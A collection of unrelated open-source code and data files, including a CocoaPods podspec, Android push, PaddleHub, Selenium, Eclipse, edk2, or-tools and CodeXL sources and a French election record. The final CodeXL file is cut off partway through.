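        .when(0, "pending")           # status == 0 -> "pending"
        .when(1, "done")              # status == 1 -> "done"
        .else_("unknown")             # anything else -> "unknown"
        .end()                        # build the case expression
    )
    print(type(expr))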
| 1,519 |
5,169 |
{
"name": "Konotor",
"version": "3.6.10",
"summary": "Konotor - iOS SDK - Rich 2 way messaging inbox for apps",
"description": " Konotor enables businesses and app owners to engage, retain and sell more to their mobile app users by powering a rich 2-way messaging inbox for apps.\n\n * enables a whatsapp/imessage like experience inside the app\n * provides a set of tools to help you engage users in a personalized and contextual manner (www.konotor.com)\n * can be used for marketing, life cycle messaging, feedback, pro-active support, and more\n * has APIs, integrations and allows for customization\n",
"homepage": "http://www.konotor.com",
"license": "MIT",
"authors": {
"<NAME>": "<EMAIL>"
},
"social_media_url": "http://twitter.com/konotor",
"platforms": {
"ios": "5.1"
},
"source": {
"git": "https://github.com/deepak-bala/konotor-ios.git",
"tag": "3.6.10"
},
"source_files": [
"Konotor/*/*.{h,m}",
"Konotor/*/*/*.h"
],
"preserve_paths": [
"Konotor/include/Konotor/*.h",
"Konotor/libKonotorCombined.a",
"Konotor/KonotorModels.bundle"
],
"resources": [
"Konotor/*/*/*.png",
"Konotor/KonotorModels.bundle",
"Konotor/*/*.xib"
],
"ios": {
"vendored_libraries": "Konotor/libKonotorCombined.a"
},
"frameworks": [
"Foundation",
"UIKit",
"AVFoundation",
"CoreGraphics",
"AudioToolbox",
"CoreMedia",
"CoreData",
"ImageIO",
"QuartzCore"
],
"xcconfig": {
"LIBRARY_SEARCH_PATHS": "\"$(PODS_ROOT)/Konotor\""
},
"requires_arc": true
}
| 730 |
348 |
<gh_stars>100-1000
{"nom":"Donnery","circ":"6ème circonscription","dpt":"Loiret","inscrits":2000,"abs":1073,"votants":927,"blancs":68,"nuls":34,"exp":825,"res":[{"nuance":"MDM","nom":"<NAME>","voix":458},{"nuance":"UDI","nom":"Mme <NAME>","voix":367}]}
| 103 |
778 |
<reponame>qiongqiong-wu/XPush
/*
* Copyright (C) 2019 xuexiangjys(<EMAIL>)
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*/
package com.xuexiang.xpush.huawei;
import android.content.Context;
import com.huawei.hms.support.api.push.PushReceiver;
import com.xuexiang.xpush.XPush;
import com.xuexiang.xpush.logs.PushLog;
import com.xuexiang.xpush.util.PushUtils;
import java.nio.charset.Charset;
import static com.xuexiang.xpush.core.annotation.CommandType.TYPE_REGISTER;
import static com.xuexiang.xpush.core.annotation.ConnectStatus.CONNECTED;
import static com.xuexiang.xpush.core.annotation.ConnectStatus.DISCONNECT;
import static com.xuexiang.xpush.core.annotation.ResultCode.RESULT_OK;
import static com.xuexiang.xpush.huawei.HuaweiPushClient.HUAWEI_PUSH_PLATFORM_NAME;
/**
 * Push message receiver
*
* @author xuexiang
* @since 2019-08-23 15:21
*/
public class HuaweiPushReceiver extends PushReceiver {
private static final String TAG = "HuaweiPush-";
@Override
public void onToken(Context context, String token) {
PushLog.d(TAG + "[onToken]:" + token);
PushUtils.savePushToken(HUAWEI_PUSH_PLATFORM_NAME, token);
XPush.transmitCommandResult(context, TYPE_REGISTER, RESULT_OK, token, null, null);
}
@Override
public void onPushState(Context context, boolean pushState) {
PushLog.d(TAG + "[onPushState]:" + pushState);
XPush.transmitConnectStatusChanged(context, pushState ? CONNECTED : DISCONNECT);
}
@Override
public void onPushMsg(Context context, byte[] bytes, String token) {
String msg = new String(bytes, Charset.forName("UTF-8"));
PushLog.d(TAG + "[onPushMsg]:" + msg);
XPush.transmitMessage(context, msg, null, null);
}
}
| 823 |
8,360 |
# coding:utf-8
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ast
import os
import json
import sys
import argparse
import contextlib
from collections import namedtuple
import paddle.fluid as fluid
import paddlehub as hub
from paddlehub.module.module import runnable
from paddlehub.module.nlp_module import DataFormatError
from paddlehub.common.logger import logger
from paddlehub.module.module import moduleinfo, serving
import plato2_en_base.models as plato_models
from plato2_en_base.tasks.dialog_generation import DialogGeneration
from plato2_en_base.utils import check_cuda, Timer
from plato2_en_base.utils.args import parse_args
@moduleinfo(
name="plato2_en_base",
version="1.0.0",
summary=
"A novel pre-training model for dialogue generation, incorporated with latent discrete variables for one-to-many relationship modeling.",
author="baidu-nlp",
author_email="",
type="nlp/text_generation",
)
class Plato(hub.NLPPredictionModule):
def _initialize(self):
"""
initialize with the necessary elements
"""
if "CUDA_VISIBLE_DEVICES" not in os.environ:
raise RuntimeError("The module only support GPU. Please set the environment variable CUDA_VISIBLE_DEVICES.")
args = self.setup_args()
self.task = DialogGeneration(args)
self.model = plato_models.create_model(args, fluid.CUDAPlace(0))
self.Example = namedtuple("Example", ["src", "data_id"])
self._interactive_mode = False
def setup_args(self):
"""
Setup arguments.
"""
assets_path = os.path.join(self.directory, "assets")
vocab_path = os.path.join(assets_path, "vocab.txt")
init_pretraining_params = os.path.join(assets_path, "24L", "Plato")
spm_model_file = os.path.join(assets_path, "spm.model")
nsp_inference_model_path = os.path.join(assets_path, "24L", "NSP")
config_path = os.path.join(assets_path, "24L.json")
        # argparse parses sys.argv[1:] and drops the first element, so sys.argv[0] must be a placeholder empty string ""
sys.argv = [
"", "--model", "Plato", "--vocab_path",
"%s" % vocab_path, "--do_lower_case", "False", "--init_pretraining_params",
"%s" % init_pretraining_params, "--spm_model_file",
"%s" % spm_model_file, "--nsp_inference_model_path",
"%s" % nsp_inference_model_path, "--ranking_score", "nsp_score", "--do_generation", "True", "--batch_size",
"1", "--config_path",
"%s" % config_path
]
parser = argparse.ArgumentParser()
plato_models.add_cmdline_args(parser)
DialogGeneration.add_cmdline_args(parser)
args = parse_args(parser)
args.load(args.config_path, "Model")
args.run_infer = True # only build infer program
return args
@serving
def generate(self, texts):
"""
Get the robot responses of the input texts.
Args:
texts(list or str): If not in the interactive mode, texts should be a list in which every element is the chat context separated with '\t'.
                Otherwise, texts should be one sentence. The module can get the context automatically.
Returns:
results(list): the robot responses.
"""
if not texts:
return []
if self._interactive_mode:
if isinstance(texts, str):
self.context.append(texts.strip())
texts = [" [SEP] ".join(self.context[-self.max_turn:])]
else:
raise ValueError("In the interactive mode, the input data should be a string.")
elif not isinstance(texts, list):
raise ValueError("If not in the interactive mode, the input data should be a list.")
bot_responses = []
for i, text in enumerate(texts):
example = self.Example(src=text.replace("\t", " [SEP] "), data_id=i)
record = self.task.reader._convert_example_to_record(example, is_infer=True)
data = self.task.reader._pad_batch_records([record], is_infer=True)
pred = self.task.infer_step(self.model, data)[0] # batch_size is 1
bot_response = pred["response"] # ignore data_id and score
bot_responses.append(bot_response)
if self._interactive_mode:
self.context.append(bot_responses[0].strip())
return bot_responses
@contextlib.contextmanager
def interactive_mode(self, max_turn=6):
"""
Enter the interactive mode.
Args:
            max_turn(int): the max dialogue turns. max_turn = 1 means the robot can only remember the last utterance you have said.
"""
self._interactive_mode = True
self.max_turn = max_turn
self.context = []
yield
self.context = []
self._interactive_mode = False
@runnable
def run_cmd(self, argvs):
"""
Run as a command
"""
self.parser = argparse.ArgumentParser(
description='Run the %s module.' % self.name,
prog='hub run %s' % self.name,
usage='%(prog)s',
add_help=True)
self.arg_input_group = self.parser.add_argument_group(title="Input options", description="Input data. Required")
self.arg_config_group = self.parser.add_argument_group(
title="Config options", description="Run configuration for controlling module behavior, optional.")
self.add_module_input_arg()
args = self.parser.parse_args(argvs)
try:
input_data = self.check_input_data(args)
        except (DataFormatError, RuntimeError):
self.parser.print_help()
return None
results = self.generate(texts=input_data)
return results
if __name__ == "__main__":
module = Plato()
for result in module.generate(["Hello", "Hello\thi, nice to meet you, my name is tom\tso your name is tom?"]):
print(result)
with module.interactive_mode(max_turn=3):
while True:
human_utterance = input()
robot_utterance = module.generate(human_utterance)
print("Robot: %s" % robot_utterance[0])
| 2,798 |
868 |
<reponame>phamleduy04/lavaplayer
package com.sedmelluq.discord.lavaplayer.tools.http;
import java.util.Collection;
import java.util.function.Consumer;
import java.util.function.Function;
import org.apache.http.client.config.RequestConfig;
import org.apache.http.impl.client.HttpClientBuilder;
public class MultiHttpConfigurable implements ExtendedHttpConfigurable {
private final Collection<ExtendedHttpConfigurable> configurables;
public MultiHttpConfigurable(Collection<ExtendedHttpConfigurable> configurables) {
this.configurables = configurables;
}
@Override
public void setHttpContextFilter(HttpContextFilter filter) {
for (ExtendedHttpConfigurable configurable : configurables) {
configurable.setHttpContextFilter(filter);
}
}
@Override
public void configureRequests(Function<RequestConfig, RequestConfig> configurator) {
for (ExtendedHttpConfigurable configurable : configurables) {
configurable.configureRequests(configurator);
}
}
@Override
public void configureBuilder(Consumer<HttpClientBuilder> configurator) {
for (ExtendedHttpConfigurable configurable : configurables) {
configurable.configureBuilder(configurator);
}
}
}
| 364 |
379 |
package com.example.springdemo.springdemo.selenium;
import org.openqa.selenium.By;
import org.openqa.selenium.JavascriptExecutor;
import org.openqa.selenium.WebDriver;
import org.openqa.selenium.WebElement;
import org.openqa.selenium.support.ui.ExpectedConditions;
import org.openqa.selenium.support.ui.WebDriverWait;
import org.springframework.stereotype.Service;
/**
* @program: springBootPractice
* @description:
* @author: hu_pf
* @create: 2020-06-03 14:16
**/
@Service("className")
public class ClickByClassName implements ClickInterface{
@Override
public void click(String name, WebDriver driver) {
waitDriver(name,driver);
WebElement element = driver.findElement(By.className(name));
((JavascriptExecutor) driver).executeScript("arguments[0].click();", element);
}
@Override
public void waitDriver(String name,WebDriver driver) {
WebDriverWait wait = new WebDriverWait(driver,10,1);
wait.until(ExpectedConditions.elementToBeClickable(By.className(name)));
}
}
| 362 |
1,768 |
<reponame>zwergziege/tlaplus
/*******************************************************************************
* Copyright (c) 2019 Microsoft Research. All rights reserved.
*
* The MIT License (MIT)
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
* of the Software, and to permit persons to whom the Software is furnished to do
* so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all
* copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
* WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*
* Contributors:
* <NAME> - initial API and implementation
* <NAME> - Rewrite of ErrorViewTraceFilterDialog
******************************************************************************/
package org.lamport.tla.toolbox.tool.tlc.ui.dialog;
import java.util.Arrays;
import java.util.Set;
import org.eclipse.jface.dialogs.Dialog;
import org.eclipse.jface.dialogs.IDialogConstants;
import org.eclipse.jface.resource.JFaceResources;
import org.eclipse.jface.viewers.ArrayContentProvider;
import org.eclipse.jface.viewers.CheckboxTableViewer;
import org.eclipse.jface.viewers.ColumnLabelProvider;
import org.eclipse.swt.SWT;
import org.eclipse.swt.events.SelectionAdapter;
import org.eclipse.swt.events.SelectionEvent;
import org.eclipse.swt.layout.GridData;
import org.eclipse.swt.layout.GridLayout;
import org.eclipse.swt.widgets.Button;
import org.eclipse.swt.widgets.Composite;
import org.eclipse.swt.widgets.Control;
import org.eclipse.swt.widgets.Label;
import org.eclipse.swt.widgets.Shell;
public class ExtraModulesDialog extends Dialog {
private CheckboxTableViewer tableViewer;
private final Set<String> modules;
private final Set<String> selection;
/**
* @param parentShell
* @param modules a copy of this list will be made
* @param previouslySelectedModuleNames
*/
public ExtraModulesDialog(final Shell parentShell, final Set<String> modules, Set<String> previouslySelectedModuleNames) {
super(parentShell);
this.modules = modules;
this.selection = previouslySelectedModuleNames;
}
public Set<String> getSelection() {
return selection;
}
@Override
protected final Control createDialogArea(final Composite parent) {
final Composite container = (Composite) super.createDialogArea(parent);
GridLayout gl = new GridLayout(2, false);
gl.verticalSpacing = 9;
container.setLayout(gl);
final Label l = new Label(container, SWT.LEFT);
l.setText("Selected modules to be made available in trace expressions.");
l.setFont(JFaceResources.getFontRegistry().get(JFaceResources.DIALOG_FONT));
GridData gd = new GridData();
gd.horizontalSpan = 2;
l.setLayoutData(gd);
tableViewer = CheckboxTableViewer.newCheckList(container, SWT.BORDER | SWT.V_SCROLL | SWT.SINGLE);
tableViewer.setContentProvider(new ArrayContentProvider());
tableViewer.setLabelProvider(new ColumnLabelProvider() {
@Override
public String getText(final Object element) {
return (String) element;
}
});
tableViewer.setInput(modules);
selection.stream().forEach((element) -> tableViewer.setChecked(element, true));
gd = new GridData();
gd.horizontalAlignment = SWT.FILL;
gd.grabExcessHorizontalSpace = true;
gd.minimumWidth = 333;
tableViewer.getTable().setLayoutData(gd);
final Composite buttonPane = new Composite(container, SWT.NONE);
gl = new GridLayout(1, false);
buttonPane.setLayout(gl);
Button b = new Button(buttonPane, SWT.PUSH);
b.setText("Select All");
gd = new GridData();
gd.horizontalAlignment = SWT.FILL;
gd.grabExcessHorizontalSpace = true;
b.setLayoutData(gd);
b.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(final SelectionEvent se) {
tableViewer.setAllChecked(true);
}
});
b = new Button(buttonPane, SWT.PUSH);
b.setText("Deselect All");
gd = new GridData();
gd.horizontalAlignment = SWT.FILL;
gd.grabExcessHorizontalSpace = true;
b.setLayoutData(gd);
b.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(final SelectionEvent se) {
tableViewer.setAllChecked(false);
}
});
return container;
}
@Override
protected void okPressed() {
selection.clear();
Arrays.stream(tableViewer.getCheckedElements()).forEach((element) -> selection.add((String)element));
super.okPressed();
}
@Override
protected void createButtonsForButtonBar(Composite parent) {
createButton(parent, IDialogConstants.OK_ID, IDialogConstants.OK_LABEL, true);
}
@Override
protected void configureShell(Shell shell) {
super.configureShell(shell);
shell.setText("Extra Modules");
}
}
| 2,003 |
2,757 |
<reponame>KrzysztofKoch1/edk2
/** @file
  ACPI Watchdog Action Table (WDAT) as defined at
Microsoft Hardware Watchdog Timers Design Specification.
Copyright (c) 2008 - 2018, Intel Corporation. All rights reserved.<BR>
This program and the accompanying materials
are licensed and made available under the terms and conditions of the BSD License
which accompanies this distribution. The full text of the license may be found at
http://opensource.org/licenses/bsd-license.php
THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
**/
#ifndef _WATCHDOG_ACTION_TABLE_H_
#define _WATCHDOG_ACTION_TABLE_H_
#include <IndustryStandard/Acpi.h>
//
// Ensure proper structure formats
//
#pragma pack(1)
///
/// Watchdog Action Table definition.
///
typedef struct {
EFI_ACPI_DESCRIPTION_HEADER Header;
UINT32 WatchdogHeaderLength;
UINT16 PCISegment;
UINT8 PCIBusNumber;
UINT8 PCIDeviceNumber;
UINT8 PCIFunctionNumber;
UINT8 Reserved_45[3];
UINT32 TimerPeriod;
UINT32 MaxCount;
UINT32 MinCount;
UINT8 WatchdogFlags;
UINT8 Reserved_61[3];
UINT32 NumberWatchdogInstructionEntries;
} EFI_ACPI_WATCHDOG_ACTION_1_0_TABLE;
///
/// Watchdog Instruction Entries
///
typedef struct {
UINT8 WatchdogAction;
UINT8 InstructionFlags;
UINT8 Reserved_2[2];
EFI_ACPI_2_0_GENERIC_ADDRESS_STRUCTURE RegisterRegion;
UINT32 Value;
UINT32 Mask;
} EFI_ACPI_WATCHDOG_ACTION_1_0_WATCHDOG_ACTION_INSTRUCTION_ENTRY;
#pragma pack()
///
/// WDAT Revision (defined in spec)
///
#define EFI_ACPI_WATCHDOG_ACTION_1_0_TABLE_REVISION 0x01
//
// WDAT 1.0 Flags
//
#define EFI_ACPI_WDAT_1_0_WATCHDOG_ENABLED 0x1
#define EFI_ACPI_WDAT_1_0_WATCHDOG_STOPPED_IN_SLEEP_STATE 0x80
//
// WDAT 1.0 Watchdog Actions
//
#define EFI_ACPI_WDAT_1_0_WATCHDOG_ACTION_RESET 0x1
#define EFI_ACPI_WDAT_1_0_WATCHDOG_ACTION_QUERY_CURRENT_COUNTDOWN_PERIOD 0x4
#define EFI_ACPI_WDAT_1_0_WATCHDOG_ACTION_QUERY_COUNTDOWN_PERIOD 0x5
#define EFI_ACPI_WDAT_1_0_WATCHDOG_ACTION_SET_COUNTDOWN_PERIOD 0x6
#define EFI_ACPI_WDAT_1_0_WATCHDOG_ACTION_QUERY_RUNNING_STATE 0x8
#define EFI_ACPI_WDAT_1_0_WATCHDOG_ACTION_SET_RUNNING_STATE 0x9
#define EFI_ACPI_WDAT_1_0_WATCHDOG_ACTION_QUERY_STOPPED_STATE 0xA
#define EFI_ACPI_WDAT_1_0_WATCHDOG_ACTION_SET_STOPPED_STATE 0xB
#define EFI_ACPI_WDAT_1_0_WATCHDOG_ACTION_QUERY_REBOOT 0x10
#define EFI_ACPI_WDAT_1_0_WATCHDOG_ACTION_SET_REBOOT 0x11
#define EFI_ACPI_WDAT_1_0_WATCHDOG_ACTION_QUERY_SHUTDOWN 0x12
#define EFI_ACPI_WDAT_1_0_WATCHDOG_ACTION_SET_SHUTDOWN 0x13
#define EFI_ACPI_WDAT_1_0_WATCHDOG_ACTION_QUERY_WATCHDOG_STATUS 0x20
#define EFI_ACPI_WDAT_1_0_WATCHDOG_ACTION_SET_WATCHDOG_STATUS 0x21
//
// WDAT 1.0 Watchdog Action Entry Instruction Flags
//
#define EFI_ACPI_WDAT_1_0_WATCHDOG_INSTRUCTION_READ_VALUE 0x0
#define EFI_ACPI_WDAT_1_0_WATCHDOG_INSTRUCTION_READ_COUNTDOWN 0x1
#define EFI_ACPI_WDAT_1_0_WATCHDOG_INSTRUCTION_WRITE_VALUE 0x2
#define EFI_ACPI_WDAT_1_0_WATCHDOG_INSTRUCTION_WRITE_COUNTDOWN 0x3
#define EFI_ACPI_WDAT_1_0_WATCHDOG_INSTRUCTION_PRESERVE_REGISTER 0x80
#endif
| 2,216 |
8,273 |
// Copyright 2010-2021 Google LLC
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#ifndef OR_TOOLS_SAT_TIMETABLE_EDGEFINDING_H_
#define OR_TOOLS_SAT_TIMETABLE_EDGEFINDING_H_
#include <vector>
#include "ortools/base/int_type.h"
#include "ortools/base/macros.h"
#include "ortools/sat/integer.h"
#include "ortools/sat/intervals.h"
#include "ortools/sat/sat_base.h"
namespace operations_research {
namespace sat {
// TimeTableEdgeFinding implements the timetable edge finding filtering rule
// presented in <NAME>, "Timetable edge finding filtering algorithm for
// discrete cumulative resources", CPAIOR 2011,
// http://vilim.eu/petr/cpaior2011.pdf.
//
// This propagator runs in O(n^2) where n is the number of tasks. It both
// increases the start times and decreases the end times of the tasks.
//
// Note that this propagator does not ensure that the cumulative constraint
// holds. It should thus always be used with at least a timetable propagator.
//
// ALGORITHM:
//
// The algorithm relies on free tasks. A free task is basically a task without
// its mandatory part. For instance:
//
// s_min s_max e_min e_max
// v v v v
// task: =============================
// ^ ^ ^
// | free part | Mandatory part |
//
// Obviously, the free part of a task that has no mandatory part is equal to the
// task itself. Also, a free part cannot have a mandatory part by definition. A
// fixed task thus has no free part.
//
// The idea of the algorithm is to use free and mandatory parts separately to
// have a better estimation of the energy contained in a task interval.
//
// If the sum of the energy of all the free parts and mandatory subparts
// contained in a task interval exceeds the amount of energy available, then the
// problem is unfeasible. A task thus cannot be scheduled at its minimum start
// time if this would cause an overload in one of the task intervals.
class TimeTableEdgeFinding : public PropagatorInterface {
public:
TimeTableEdgeFinding(const std::vector<AffineExpression>& demands,
AffineExpression capacity,
SchedulingConstraintHelper* helper,
IntegerTrail* integer_trail);
bool Propagate() final;
void RegisterWith(GenericLiteralWatcher* watcher);
private:
  // Builds the timetable and fills the mandatory_energy_before_start_min_ and
// mandatory_energy_before_end_max_.
//
// TODO(user): Share the profile building code with TimeTablingPerTask ! we do
// not really need the mandatory_energy_before_* vectors and can recompute the
// profile integral in a window efficiently during TimeTableEdgeFindingPass().
void BuildTimeTable();
// Performs a single pass of the Timetable Edge Finding filtering rule to
  // update the start times of the tasks. This same function can be used to
// update the end times by calling the SwitchToMirrorProblem method first.
bool TimeTableEdgeFindingPass();
// Increases the start min of task_index with the proper explanation.
bool IncreaseStartMin(IntegerValue begin, IntegerValue end, int task_index,
IntegerValue new_start);
IntegerValue DemandMin(int task_index) const {
return integer_trail_->LowerBound(demands_[task_index]);
}
IntegerValue CapacityMax() const {
return integer_trail_->UpperBound(capacity_);
}
// Number of tasks.
const int num_tasks_;
// IntervalVariable and IntegerVariable of each tasks that must be considered
// in this constraint.
std::vector<AffineExpression> demands_;
const AffineExpression capacity_;
SchedulingConstraintHelper* helper_;
IntegerTrail* integer_trail_;
// Start (resp. end) of the compulsory parts used to build the profile.
std::vector<TaskTime> scp_;
std::vector<TaskTime> ecp_;
// Sizes and energy of the free parts. One is just the other times the
// minimum demand.
std::vector<IntegerValue> size_free_;
std::vector<IntegerValue> energy_free_;
// Energy contained in the time table before the start min (resp. end max)
// of each task.
std::vector<IntegerValue> mandatory_energy_before_start_min_;
std::vector<IntegerValue> mandatory_energy_before_end_max_;
DISALLOW_COPY_AND_ASSIGN(TimeTableEdgeFinding);
};
} // namespace sat
} // namespace operations_research
#endif // OR_TOOLS_SAT_TIMETABLE_EDGEFINDING_H_
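// An illustrative, self-contained sketch (not the or-tools implementation) of
// the energy argument described in the comment above: within a window
// [begin, end), the free energy of tasks that must lie entirely inside the
// window plus the mandatory energy already inside it may not exceed
// CapacityMax() * (end - begin). The struct fields below are assumptions made
// for the sketch, not members of the propagator.
#include <cstdint>
#include <vector>

struct TaskEnergySketch {
  int64_t start_min;            // earliest start time
  int64_t end_max;              // latest end time
  int64_t energy_free;          // size of the free part times its minimum demand
  int64_t mandatory_in_window;  // mandatory energy falling inside [begin, end)
};

inline bool WindowIsOverloaded(const std::vector<TaskEnergySketch>& tasks,
                               int64_t begin, int64_t end,
                               int64_t capacity_max) {
  int64_t energy = 0;
  for (const TaskEnergySketch& t : tasks) {
    // The free part is only counted when the whole task fits in the window.
    if (begin <= t.start_min && t.end_max <= end) energy += t.energy_free;
    energy += t.mandatory_in_window;
  }
  return energy > capacity_max * (end - begin);
}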
| 1,581 |
1,025 |
//=====================================================================
// Copyright (c) 2012 Advanced Micro Devices, Inc. All rights reserved.
//
/// \author GPU Developer Tools
/// \file $File: //devtools/main/CodeXL/Components/GpuProfiling/AMDTGpuProfiling/TraceView.cpp $
/// \version $Revision: #144 $
/// \brief : This file contains TraceView
//
//=====================================================================
// $Id: //devtools/main/CodeXL/Components/GpuProfiling/AMDTGpuProfiling/TraceView.cpp#144 $
// Last checkin: $DateTime: 2016/03/30 04:04:03 $
// Last edited by: $Author: salgrana $
// Change list: $Change: 566240 $
//==============
#include <qtIgnoreCompilerWarnings.h>
#include <QtCore>
#include <QtWidgets>
// Infra:
#include <AMDTBaseTools/Include/gtAssert.h>
#include <AMDTAPIClasses/Include/Events/apEventsHandler.h>
#include <AMDTApplicationComponents/Include/acItemDelegate.h>
#include <AMDTApplicationComponents/Include/acMessageBox.h>
#include <AMDTApplicationComponents/Include/acFunctions.h>
#include <AMDTOSWrappers/Include/osThread.h>
#include <AMDTApplicationComponents/Include/Timeline/acTimeline.h>
#include "AtpUtils.h"
#include <HSAFunctionDefs.h>
// AMDTApplicationFramework:
#include <AMDTApplicationFramework/Include/afApplicationCommands.h>
#include <AMDTApplicationFramework/Include/afGlobalVariablesManager.h>
#include <AMDTApplicationFramework/Include/afProgressBarWrapper.h>
#include <AMDTApplicationFramework/Include/afHTMLContent.h>
// AMDTApplicationFramework:
#include <AMDTApplicationFramework/Include/afApplicationCommands.h>
#include <AMDTApplicationFramework/Include/afMainAppWindow.h>
// AMDTSharedProfiling:
#include <AMDTSharedProfiling/inc/ProfileApplicationTreeHandler.h>
#include <CL/cl.h>
// Local:
#include <AMDTGpuProfiling/CLAPIDefs.h>
#include <AMDTGpuProfiling/TraceView.h>
#include <AMDTGpuProfiling/TraceTable.h>
#include <AMDTGpuProfiling/AMDTGpuProfilerDefs.h>
#include <AMDTGpuProfiling/CLTimelineItems.h>
#include <AMDTGpuProfiling/HSATimelineItems.h>
#include <AMDTGpuProfiling/KernelOccupancyWindow.h>
#include <AMDTGpuProfiling/SymbolInfo.h>
#include <AMDTGpuProfiling/APIColorMap.h>
#include <AMDTGpuProfiling/ProfileManager.h>
#include <AMDTGpuProfiling/SessionViewTabWidget.h>
#include <AMDTGpuProfiling/gpViewsCreator.h>
#include <iostream>
#include <Version.h>
#include <ProfilerOutputFileDefs.h>
static QList<TraceTableModel::TraceTableColIndex> s_hsaHiddenColumns = { TraceTableModel::TRACE_DEVICE_BLOCK_COLUMN, TraceTableModel::TRACE_OCCUPANCY_COLUMN, TraceTableModel::TRACE_DEVICE_TIME_COLUMN };
static const unsigned int s_UI_REFRESH_RATE = 1000;
static const unsigned int s_MAX_TRACE_ENTRIES = 200000;
static const int PROGRESS_STAGES = 6;
TraceView::TraceView(QWidget* parent) : gpBaseSessionView(parent),
m_pCurrentSession(nullptr),
m_pMainSplitter(nullptr),
m_pTimeline(nullptr),
m_pTraceTabView(nullptr),
m_pSummaryView(nullptr),
m_pSymbolInfo(nullptr),
m_pSummarizer(nullptr),
m_pOpenCLBranch(nullptr),
m_pHSABranch(nullptr),
m_pHSADataTransferBranch(nullptr),
m_perfMarkersAdded(false)
#ifdef SHOW_KERNEL_LAUNCH_AND_COMPLETION_LATENCY
, m_lastDeviceItem(nullptr),
m_lastDeviceItemIdx(-1)
#endif
, m_areTimelinePropertiesSet(false),
m_parseCallsCounter(0),
m_alreadyDisplayedAPILimitMessage(false),
m_shouldStopParsing(false),
m_maxTimestampWhenParsingStopped(0),
m_isProgressRangeSet(false)
{
BuildWindowLayout();
// Add the actions to the table:
m_pCopyAction = m_pTraceTableContextMenu->addAction(AF_STR_CopyA, this, SLOT(OnEditCopy()));
m_pSelectAllAction = m_pTraceTableContextMenu->addAction(AF_STR_SelectAllA, this, SLOT(OnEditSelectAll()));
m_pTraceTableContextMenu->addSeparator();
m_pExpandAllAction = m_pTraceTableContextMenu->addAction(GPU_STR_TraceViewExpandAll, this, SLOT(OnExpandAll()));
m_pCollapseAllAction = m_pTraceTableContextMenu->addAction(GPU_STR_TraceViewCollapseAll, this, SLOT(OnCollapseAll()));
m_pTraceTableContextMenu->addSeparator();
m_pGotoSourceAction = m_pTraceTableContextMenu->addAction(GPU_STR_TraceViewGoToSource, this, SLOT(OnGotoSource()));
m_pZoomInTimelineAction = m_pTraceTableContextMenu->addAction(GPU_STR_TraceViewZoomTimeline, this, SLOT(OnZoomItemInTimeline()));
m_pTraceTableContextMenu->addSeparator();
m_pExportToCSVAction = m_pTraceTableContextMenu->addAction(AF_STR_ExportToCSV, this, SLOT(OnExportToCSV()));
bool rc = connect(m_pTimeline, SIGNAL(itemClicked(acTimelineItem*)), this, SLOT(TimelineItemClickedHandler(acTimelineItem*)));
GT_ASSERT(rc);
rc = connect(m_pTimeline, SIGNAL(branchClicked(acTimelineBranch*)), this, SLOT(TimelineBranchClickedHandler(acTimelineBranch*)));
GT_ASSERT(rc);
rc = connect(afApplicationCommands::instance()->applicationTree()->treeControl(), SIGNAL(itemChanged(QTreeWidgetItem*, int)), this, SLOT(OnApplicationTreeSelection()));
GT_ASSERT(rc);
}
TraceView::~TraceView()
{
SAFE_DELETE(m_pSummarizer);
// Remove me from the list of session windows in the session view creator:
gpViewsCreator::Instance()->OnWindowClose(this);
AtpUtils::Instance()->RemoveHandlerFromCallBackHandlerList(this);
}
bool TraceView::DisplaySession(const osFilePath& sessionFilePath, afTreeItemType sessionInnerPage, QString& errorMessage)
{
bool retVal = true;
// If this is a new session file, load the session
if (m_sessionFilePath != sessionFilePath)
{
// Call the base class implementation
retVal = SharedSessionWindow::DisplaySession(sessionFilePath, sessionInnerPage, errorMessage);
// Initialize the session file path:
m_sessionFilePath = sessionFilePath;
m_pCurrentSession = nullptr;
m_alreadyDisplayedAPILimitMessage = false;
m_shouldStopParsing = false;
m_maxTimestampWhenParsingStopped = 0;
m_pCurrentSession = qobject_cast <TraceSession*> (m_pSessionData);
// Sanity check:
GT_IF_WITH_ASSERT((m_pCurrentSession != nullptr) && (m_pCurrentSession->m_pParentData != nullptr))
{
// Reset the flag stating the the occupancy file was loaded:
